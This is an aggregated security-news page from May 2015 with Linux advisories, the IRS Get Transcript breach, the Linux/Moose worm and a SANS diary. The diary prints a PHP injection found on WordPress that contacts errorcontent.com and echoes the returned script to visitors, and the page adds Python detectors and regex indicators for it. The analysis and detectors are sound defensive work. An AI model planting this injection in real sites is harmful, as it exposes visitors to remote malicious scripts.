(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
LinuxSecurity.com: Security Report Summary
LinuxSecurity.com: OpenLDAP could be made to crash if it received specially crafted network traffic.

In an official statement issued today, the IRS announced that it has shut down an online service to obtain tax records after determining that "unusual activity had taken place on the application, which indicates that unauthorized third parties had access to some accounts on the transcript application." An initial review of that activity revealed "access was gained to more than 100,000 accounts through the Get Transcript application," according to the IRS statement.

After the IRS disclosed more information, it became clear the user data was not obtained because of a direct hack of government systems. Rather, weak authentication used by the IRS to protect access to taxpayer data is likely at fault. The attackers were able to acquire taxpayer records using stolen personal identifying information, possibly pulled from online financial fraud marketplaces.

The Get Transcript application, a feature of the IRS site that lets taxpayers download tax return and tax payment transaction data, was apparently targeted by financial fraudsters between February and mid-May. The service was shut down last week while the IRS investigated the activity, which may have been linked to the fraudulent filing of tax returns and the transfer of tax refunds. Attempts were made to access more than 200,000 accounts; roughly half failed because incorrect information was entered during the IRS authentication process.



A worm that targets cable and DSL modems, home routers, and other embedded computers is turning those devices into a proxy network for launching armies of fraudulent Instagram, Twitter, and Vine accounts as well as fake accounts on other social networks. The new worm can also hijack routers' DNS service to route requests to a malicious server, steal unencrypted social media cookies such as those used by Instagram, and then use those cookies to add "follows" to fraudulent accounts. It can also spread to other embedded systems on the local network that run Linux-based operating systems.

The malware, dubbed "Linux/Moose" by Olivier Bilodeau and Thomas Dupuy of the security firm ESET Canada Research, exploits routers open to connections from the Internet via Telnet by performing brute-force login attempts using default or common administrative credentials. Once connected, the worm installs itself on the targeted device.

Moose spreads itself using a file named elan2—"élan" is the French word for moose, Bilodeau and Dupuy explained in their report. Once installed, the malware begins to watch traffic passing through the router for unencrypted cookies from Web browsers and mobile applications, which may be passed to unencrypted sites that leverage social network features:

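The Telnet brute-forcing described above leaves a distinctive trail on the router side: a burst of failed logins with default usernames from one address, followed by a success from the same address. The script below is an added example for this page, not code from ESET's report or from the article. It parses constructed syslog-style Telnet login records (the line format, hostnames and addresses are assumptions; adapt LINE_RE to what your router, honeypot or syslog collector actually emits) and flags, per source, a brute-force burst, a success that followed failures, and which default usernames were tried.

```python
"""Flag Telnet credential brute-forcing of the kind Linux/Moose performs.

Added example for this page; it is not ESET's or the article's code.
The syslog-style line format is an assumption, and every sample line,
hostname and address below is constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Usernames that ship as defaults on a lot of consumer gear (assumed list).
DEFAULT_ADMIN_USERS = {"admin", "root", "user", "support", "guest"}

# Constructed sample log (not real traffic). One source hammers the router
# with default usernames and then gets in; the other two lines are noise.
SAMPLE_LOG = """\
May 26 10:00:01 gw telnetd[412]: login failed for 'admin' from 203.0.113.5
May 26 10:00:02 gw telnetd[412]: login failed for 'root' from 203.0.113.5
May 26 10:00:02 gw telnetd[412]: login failed for 'admin' from 203.0.113.5
May 26 10:00:03 gw telnetd[412]: login failed for 'support' from 203.0.113.5
May 26 10:00:04 gw telnetd[412]: login failed for 'root' from 203.0.113.5
May 26 10:00:05 gw telnetd[412]: login succeeded for 'root' from 203.0.113.5
May 26 10:07:30 gw telnetd[412]: login failed for 'admin' from 198.51.100.9
May 26 10:30:00 gw telnetd[412]: login succeeded for 'alice' from 192.168.1.20
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ telnetd\[\d+\]: "
    r"login (?P<result>failed|succeeded) for '(?P<user>[^']*)' from (?P<src>[\d.]+)$"
)


def parse_log(text, year=2015):
    """Return (timestamp, source_ip, username, succeeded) tuples, oldest first."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unrelated log line
        # syslog timestamps carry no year; pin one so time deltas are defined
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=year)
        events.append((ts, m["src"], m["user"], m["result"] == "succeeded"))
    return sorted(events)


def detect(events, threshold=5, window=timedelta(seconds=60)):
    """Per source IP: brute force (>= threshold failures inside `window`),
    a success that followed failures, and which default usernames were tried."""
    by_src = defaultdict(list)
    for ev in events:
        by_src[ev[1]].append(ev)

    findings = {}
    for src, evs in by_src.items():
        failures = [ts for ts, _, _, ok in evs if not ok]
        # sliding window: any `threshold` consecutive failures within `window`
        brute = any(
            failures[i + threshold - 1] - failures[i] <= window
            for i in range(len(failures) - threshold + 1)
        )
        seen_failure = compromised = False
        for _, _, _, ok in evs:
            if not ok:
                seen_failure = True
            elif seen_failure:
                compromised = True  # got in after guessing: treat the box as owned
        defaults_tried = sorted({u for _, _, u, _ in evs} & DEFAULT_ADMIN_USERS)
        if brute or compromised:
            findings[src] = {
                "bruteforce": brute,
                "compromised": compromised,
                "default_users_tried": defaults_tried,
            }
    return findings


if __name__ == "__main__":
    for src, info in detect(parse_log(SAMPLE_LOG)).items():
        print(src, info)
```

The threshold and window are deliberately loose; a worm that walks a credential list does not pace itself, so five failures in a minute from one address is already well outside what a human at a console produces. The "success after failures" flag is the one to act on, since the article's description has the worm installing itself as soon as a guess lands.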


Thanks to one of our readers for sending us this snippet of PHP he found on a WordPress server (I added some line breaks and comments for readability):

#2b8008#
@error_reporting(0);                          /* turn off error reporting (call not preserved in the copy; shown in its usual form) */
@ini_set('display_errors', 0);                /* do not display errors to the user */
$wp_mezd8610 = @$_SERVER['HTTP_USER_AGENT'];  /* only run the code if this is Chrome or IE and not a bot */
if ((preg_match('/Gecko|MSIE/i', $wp_mezd8610) && !preg_match('/bot/i', $wp_mezd8610)))
{
    # Assemble a URL like http://errorcontent.com/content?ip=[client ip]&referer=[server host name]&ua=[user agent]
    $wp_mezd098610 = 'http://' . 'error' . 'content' . '.com/' . 'content' . '/?ip=' . $_SERVER['REMOTE_ADDR'] . '&referer=' . urlencode($_SERVER['HTTP_HOST']) . '&ua=' . urlencode($wp_mezd8610);
    # check if we have the curl extension installed
    if (function_exists('curl_init') && function_exists('curl_exec')) {
        /* body not preserved in the copy; shown as the usual fetch-into-string pattern, $ch is a placeholder name */
        $ch = curl_init($wp_mezd098610);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        $wp_8610mezd = curl_exec($ch);
        curl_close($ch);
    }
    # if we don't have curl, try file_get_contents, which requires allow_url_fopen
    elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {
        $wp_8610mezd = @file_get_contents($wp_mezd098610);
    }
    # or try fopen as a last resort
    elseif (function_exists('fopen') && function_exists('stream_get_contents')) {
        $wp_8610mezd = @stream_get_contents(@fopen($wp_mezd098610, 'r'));
    }
    # The data retrieved will be echoed back to the user if it starts with the string "scr" (offset 1, so a response beginning "<script" passes)
    if (substr($wp_8610mezd, 1, 3) === 'scr') {
        echo $wp_8610mezd;
    }
}

I haven't been able to retrieve any content from errorcontent.com. Has anybody else seen this code, or is able to retrieve content from errorcontent.com?

According to whois, errorcontent.com is owned by a Chinese organization. It currently resolves to 37.1.207.26, which is owned by a British ISP. Any help as to the nature of this snippet will be appreciated.

Johannes B. Ullrich, Ph.D.

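A plain grep for errorcontent.com will miss the snippet above because the domain is assembled from string fragments, so a scanner has to key on the other tells. The scanner below is an added example for this page, not part of the ISC diary: it scores PHP files against indicators visible in the snippet (the #<hex># marker, the Gecko|MSIE-but-not-bot user-agent gate, the wp_<letters><digits> variable names, the string-split domain, the curl / file_get_contents / fopen fallback chain and the substr(..., 1, 3) === 'scr' check). The weights, the threshold, the directory layout and both sample files are constructed for the example.

```python
"""Scan a WordPress tree for the fetch-and-echo injection quoted in the diary.

Added example for this page, not part of the ISC diary. Indicators come
from the snippet shown above; weights, threshold and both samples are ours.
"""
import os
import re
import tempfile

# (label, pattern, weight). Weights are a judgement call: markers that have
# no honest reason to appear in a theme or plugin score highest.
INDICATORS = [
    ("#<hex># marker comment",        re.compile(r"#[0-9a-f]{6}#"), 3),
    ("display_errors silenced",       re.compile(r"@ini_set\(\s*['\"]display_errors['\"]"), 1),
    ("Gecko|MSIE user-agent gate",    re.compile(r"preg_match\s*\(\s*['\"]/Gecko\|MSIE/i['\"]"), 2),
    ("bot user-agent exclusion",      re.compile(r"!\s*preg_match\s*\(\s*['\"]/bot/i['\"]"), 1),
    ("wp_<letters><digits> variable", re.compile(r"\$wp_[a-z]*\d{4,}[a-z]*\b"), 2),
    ("domain split across strings",   re.compile(r"['\"]\s*\.\s*['\"]\s*content\s*['\"]"), 2),
    ("remote-fetch fallback chain",   re.compile(r"function_exists\(\s*['\"](curl_init|file_get_contents|stream_get_contents)['\"]"), 1),
    ("echo gated on 'scr' prefix",    re.compile(r"substr\([^)]*,\s*1\s*,\s*3\s*\)\s*===?\s*['\"]scr['\"]"), 3),
]
REPORT_THRESHOLD = 5  # assumed; a single weak hit should not page anyone


def score_source(src):
    """Return (score, [labels of indicators that matched]) for one file's text."""
    hits = [(label, weight) for label, rx, weight in INDICATORS if rx.search(src)]
    return sum(w for _, w in hits), [label for label, _ in hits]


def scan_tree(root):
    """Walk `root`, score every .php file, and return {relative_path: (score, hits)}
    for files at or above REPORT_THRESHOLD."""
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if not fn.endswith(".php"):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                score, hits = score_source(fh.read())
            if score >= REPORT_THRESHOLD:
                findings[os.path.relpath(path, root)] = (score, hits)
    return findings


# Constructed sample modelled on the snippet in the diary (not a live copy).
INJECTED_SAMPLE = r"""<?php
#2b8008#
@error_reporting(0); @ini_set('display_errors', 0);
$wp_mezd8610 = @$_SERVER['HTTP_USER_AGENT'];
if ((preg_match('/Gecko|MSIE/i', $wp_mezd8610) && !preg_match('/bot/i', $wp_mezd8610))) {
  $wp_mezd098610 = 'http://' . 'error' . 'content' . '.com/' . 'content' . '/?ip=' . $_SERVER['REMOTE_ADDR'];
  if (function_exists('curl_init') && function_exists('curl_exec')) { /* curl fetch */ }
  elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) { $wp_8610mezd = @file_get_contents($wp_mezd098610); }
  if (substr($wp_8610mezd, 1, 3) === 'scr') { echo $wp_8610mezd; }
}
"""

# Constructed benign file that shares a couple of the weak indicators.
BENIGN_SAMPLE = r"""<?php
@ini_set('display_errors', 0);
$wp_version = '4.2.2';
if (preg_match('/bot/i', $_SERVER['HTTP_USER_AGENT'])) { exit; }
echo substr($wp_version, 0, 3);
"""


def demo():
    """Write both samples into a throwaway tree and scan it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "wp-content", "themes", "x"))
        files = {
            os.path.join("wp-content", "themes", "x", "header.php"): INJECTED_SAMPLE,
            "wp-settings.php": BENIGN_SAMPLE,
        }
        for rel, src in files.items():
            with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
                fh.write(src)
        return scan_tree(root)


if __name__ == "__main__":
    for path, (score, hits) in demo().items():
        print(f"{path}: score {score}; matched {', '.join(hits)}")
```

Against a real install, call scan_tree() on the document root. The benign sample scores below the threshold on purpose: silencing display_errors and checking for "bot" in the user agent are common in honest code, so only the combination with the marker comment, the split domain and the "scr" gate should raise an alert.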
GAITHERSBURG, Md.—As part of a national collaborative effort to strengthen the scientific basis for forensic evidence used in the criminal justice system, the U.S. Commerce Department's National Institute of Standards and Technology ...

Posted by InfoSec News on May 26


By Jeremy Wagstaff
The Age
May 26, 2015

Security researcher Chris Roberts made headlines last month when he was
hauled off a plane in New York by the Federal Bureau of Investigation and
accused of hacking into flight controls via his underseat entertainment

Other security researchers...

Posted by InfoSec News on May 26


By Aliya Sternstein
May 25, 2015

Nearly a week after extending the terms of its original proposal, U.S.
Cyber Command revoked a 5-year contract offer that aimed to backfill
significant staffing shortages.

Cyber Command has called off a sweeping solicitation that would have
outsourced support for cyberspying and network attacks...

Posted by InfoSec News on May 26


By Jeremy Kirk
IDG News Service
May 24, 2015

An unredacted version of a database said to be stolen from Adult Friend
Finder is being offered for sale for 70 bitcoins, or around $17,000.

ROR[RG], the nickname of the person who claims to have breached the large
online hookup site, wrote on Saturday in an...
LinuxSecurity.com: The 3.19.8 update contains a number of important fixes across the tree. The 3.19.7 update contains a number of important updates across the tree. The 3.19.6 stable update contains a number of important fixes across the tree.
LinuxSecurity.com: updated to 8u45-b14. fixes rhbz#1123870
LinuxSecurity.com: **WordPress 4.2.2 Security and Maintenance Release** - Upstream announcement: https://wordpress.org/news/2015/05/wordpress-4-2-2/
LinuxSecurity.com: * **ZF2015-04**: Zend\Mail and Zend\Http were both susceptible to CRLF Injection Attack vectors (for HTTP, this is often referred to as HTTP Response Splitting). Both components were updated to perform header value validations to ensure no values contain characters not detailed in their corresponding specifications, and will raise exceptions on detection. Each also provides new facilities for both validating and filtering header values prior to injecting them into header classes. If you use either Zend\Mail or Zend\Http (which includes users of Zend\Mvc), we recommend upgrading immediately.
LinuxSecurity.com: Security fix BZ1205130 - patch for CTCP Denial of Service
LinuxSecurity.com: phpMyAdmin (2015-05-13): [security] CSRF vulnerability in setup; [security] Vulnerability allowing man-in-the-middle attack
LinuxSecurity.com: Privilege escalation via emulated floppy disk drive [XSA-133, CVE-2015-3456] (#1221153)
LinuxSecurity.com: Security fix for CVE-2015-3885
LinuxSecurity.com: Update to new upstream.
LinuxSecurity.com: Update to new upstream.
LinuxSecurity.com: * CVE-2015-3456: (VENOM) fdc: out-of-bounds fifo buffer memory access (bz #1221152)
LinuxSecurity.com: 14 May 2015, **PHP 5.6.9**
Core:
* Fixed bug #69467 (Wrong checked for the interface by using Trait). (Laruence)
* Fixed bug #69420 (Invalid read in zend_std_get_method). (Laruence)
* Fixed bug #60022 ("use statement [...] has no effect" depends on leading backslash). (Nikita)
* Fixed bug #67314 (Segmentation fault in gc_remove_zval_from_buffer). (Dmitry)
* Fixed bug #68652 (segmentation fault in destructor). (Dmitry)
* Fixed bug #69419 (Returning compatible sub generator produces a warning). (Nikita)
* Fixed bug #69472 (php_sys_readlink ignores misc errors from GetFinalPathNameByHandleA). (Jan Starke)
* Fixed bug #69364 (PHP Multipart/form-data remote dos Vulnerability). (Stas)
* Fixed bug #69403 (str_repeat() sign mismatch based memory corruption). (Stas)
* Fixed bug #69418 (CVE-2006-7243 fix regressions in 5.4+). (Stas)
* Fixed bug #69522 (heap buffer overflow in unpack()). (Stas)
FTP:
* Fixed bug #69545 (Integer overflow in ftp_genlist() resulting in heap overflow). (Stas)
ODBC:
* Fixed bug #69354 (Incorrect use of SQLColAttributes with ODBC 3.0). (Anatol)
* Fixed bug #69474 (ODBC: Query with same field name from two tables returns incorrect result). (Anatol)
* Fixed bug #69381 (out of memory with sage odbc driver). (Frederic Marchall, Anatol Belski)
OpenSSL:
* Fixed bug #69402 (Reading empty SSL stream hangs until timeout). (Daniel Lowrey)
PCNTL:
* Fixed bug #68598 (pcntl_exec() should not allow null char). (Stas)
PCRE:
* Upgraded pcrelib to 8.37.
Phar:
* Fixed bug #69453 (Memory Corruption in phar_parse_tarfile when entry filename starts with null). (Stas)
[SECURITY] [DSA 3273-1] tiff security update